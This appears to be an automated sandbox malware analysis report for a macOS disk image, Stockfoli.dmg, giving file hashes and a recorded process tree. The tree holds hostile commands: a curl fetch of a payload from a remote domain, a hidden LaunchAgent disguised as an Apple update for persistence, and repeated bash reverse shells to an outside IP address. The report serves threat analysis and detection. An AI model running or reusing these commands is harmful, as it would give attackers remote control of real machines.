Analysis
-
max time network
159s -
platform
macos_amd64 -
resource
macos -
submitted
24-06-2021 12:53
Static task
static1
General
-
Target
Stockfoli.dmg
-
Size
11.2MB
-
MD5
22a526c0658e542f24358178fb079c38
-
SHA1
352985598e83b42e99dfcb19636227335a18f8c0
-
SHA256
118ba3642fdff254e37aee1ff9552fe189f7b1f8d5302d51c5010335acce6c2c
-
SHA512
73c37880c044235028708e81d840120e78951a5ab4c100338ee958bce2409890a3c9dee75eab95dd8e37e98bd73c4561ff7a3413669527fa5ef458cce26971af
Malware Config
Signatures
Processes
-
/bin/shsh -c "sudo open /Volumes/Stockfoli/Stockfoli.app"1⤵PID:539
-
/bin/bashsh -c "sudo open /Volumes/Stockfoli/Stockfoli.app"1⤵PID:539
-
/usr/bin/sudosudo open /Volumes/Stockfoli/Stockfoli.app1⤵PID:539
-
/usr/bin/openopen /Volumes/Stockfoli/Stockfoli.app2⤵PID:540
-
-
/Volumes/Stockfoli/Stockfoli.app/Contents/MacOS/Stockfoli/Volumes/Stockfoli/Stockfoli.app/Contents/MacOS/Stockfoli1⤵PID:541
-
/bin/bash/bin/bash -c "nohup sh '/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh' </dev/null >/dev/null 2>&1 &"1⤵PID:550
-
/usr/bin/nohupnohup sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh2⤵PID:551
-
-
/usr/bin/shsh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh2⤵PID:551
-
-
/bin/shsh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh2⤵PID:551
-
-
/bin/bashsh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh2⤵PID:551
-
/usr/bin/curlcurl -ks "http://owpqkszz.info/link.php?run&185.220.101.144"3⤵PID:573
-
-
/usr/bin/base64base64 --decode3⤵PID:575
-
-
/bin/catcat /tmp/.com.apple.upd.plist3⤵PID:576
-
-
/bin/cpcp /tmp/.com.apple.upd.plist /Users/run/Library/LaunchAgents/.com.apple.upd.plist3⤵PID:577
-
-
/bin/catcat /Users/run/Library/LaunchAgents/.com.apple.upd.plist3⤵PID:578
-
-
/bin/launchctllaunchctl load /tmp/.com.apple.upd.plist3⤵PID:579
-
-
/usr/bin/screenscreen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"3⤵PID:584
-
-
-
/usr/bin/whoamiwhoami1⤵PID:554
-
/usr/bin/trtr -dc "[:alnum:].\\r"1⤵PID:556
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵PID:557
-
/usr/bin/curlcurl -s ipecho.net/plain1⤵PID:560
-
/bin/bash/bin/bash -c "nohup '/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio' </dev/null >/dev/null 2>&1 &"1⤵PID:561
-
/usr/bin/nohupnohup /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio2⤵PID:562
-
-
/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio2⤵PID:562
-
-
/bin/bash/bin/bash -c "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25734 0>&1'"1⤵PID:563
-
/usr/bin/screenscreen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"1⤵PID:563
-
/usr/bin/loginlogin -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"1⤵PID:565
-
/bin/bashbash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"2⤵PID:568
-
/bin/bashbash -i3⤵PID:569
-
-
-
/bin/bash/bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25735 0>&1"1⤵PID:566
-
/bin/bashbash -i2⤵PID:567
-
-
/usr/bin/trtr -dc "[:alnum:].\\r"1⤵PID:571
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵PID:572
-
/bin/launchctllaunchctl list1⤵PID:582
-
/usr/bin/grepgrep upd1⤵PID:583
-
/usr/bin/loginlogin -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"1⤵PID:589
-
/bin/bashbash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"2⤵PID:591
-
/bin/bashbash -i3⤵PID:592
-
-
-
/bin/bash/bin/bash -c "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25736 0>&1'"1⤵PID:615
-
/usr/bin/screenscreen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"1⤵PID:615
-
/usr/bin/loginlogin -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"1⤵PID:617
-
/bin/bashbash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"2⤵PID:618
-
/bin/bashbash -i3⤵PID:619
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
d1ec6e05e4d46e06768d1e57bbe4a0e1
SHA1ee6e20dcf2682bdf84d0614287c8053cc71fd744
SHA256be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787
SHA512a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b
-
MD5
d1ec6e05e4d46e06768d1e57bbe4a0e1
SHA1ee6e20dcf2682bdf84d0614287c8053cc71fd744
SHA256be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787
SHA512a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b
-
MD5
d1ec6e05e4d46e06768d1e57bbe4a0e1
SHA1ee6e20dcf2682bdf84d0614287c8053cc71fd744
SHA256be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787
SHA512a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b
-
MD5
d1ec6e05e4d46e06768d1e57bbe4a0e1
SHA1ee6e20dcf2682bdf84d0614287c8053cc71fd744
SHA256be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787
SHA512a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b
-
MD5
ebb0a7faa9956546a1e4992db15c1f89
SHA19abe892e93d3605337dc84ba8f7573899b0585e5
SHA256411eb63035d57f9bb853e0327a91f2ad6ae556acd188080a30c45554f4f3b402
SHA5127303bf0471741cf275f0549903b8d6bd63df61ff9e83724ba15ca5f35f0902ac92e9d1b5e485bc29a765d58309b146a12af77eb9f66e4b1a5d729a58fc4db1eb
-
MD5
1a2c1acc6fc4f2300a663be1f037a8d3
SHA1ea7570da86c520cfde9ca1ae37c3a538948ad324
SHA256f9ae2bfd1327a91fd3702a2ea67cb268a26828f67c40bd440e95df83412566ab
SHA512d698402262f96f375641b1d4d3e8decb1b62b71b3c93484c9a50c1f25d637408fc0a5a23a79eb44cf1674a493ebf0f5a827079ab48a615e41994b84fbbeffd1d
-
MD5
3f7e6c6f205752cb986504166b1b3037
SHA1d3e6925bf8f0da26725effa98caf7d54876111fb
SHA256bb635b4827e77b2037a16333da358af85ff62905a44b27b8cee63b67a1b26259
SHA51273d59adba3fcd4f60cb92aa53d1d4b2978a319bf90663aeb99652900b1bae62b473d54d91601cc1d1b976503b9b20018616c9b727232581a68a41daa4d2d55fd
-
MD5
f4ebc88a7d81289168033c588c03c2a5
SHA1dd3f91fb830a70c6f1cc1f41cd25d1ad2e9470dc
SHA25616cf58feb19a0877dc7e248042012d40cb036df8638ec29da7defe5457c64459
SHA512f5e709b27ecd7f48e9b54710ae93313e3587f9fe8c8eef3a9ea2e1f63e9cb2c69820734bcd418a572996d823b173e79739b20c37bbf998fd0d5243b180ab95c9
-
MD5
c17888dc849760d8b3a0f9a9e7bf2d77
SHA19dde4a42c8a59a5f1798dceb6e09c8e61094b504
SHA256d1dd27a95370338a0e79c7c25189d551a0c2c1a4bb25f7bad99e38406c8a72f1
SHA5127432f19f04728afb2dd192ce00fce477bda2a1687feee8be9299d66b7cd58023837dafa06d45dd9598ff63ccd8bb275e7539d89e6fb3ddf7cd69dbec9abf9143
-
MD5
42736086060db6e7fc1f3a69eded83db
SHA13d6e08dbb4a92335369e2a40f1586a8154db7233
SHA25650e9da2d41889df1f86dd9fef667c4ff836e9b640789817ee813b6b7a6ed7e4a
SHA512c69b8e40ef6d806a23ca6d8bb94aa033f19f710e48761bf7ce1e1f5a729c5c495358b09a4bbf802c1040304acec9b899d83f79ecc12e9ef019b0e2ce5259c129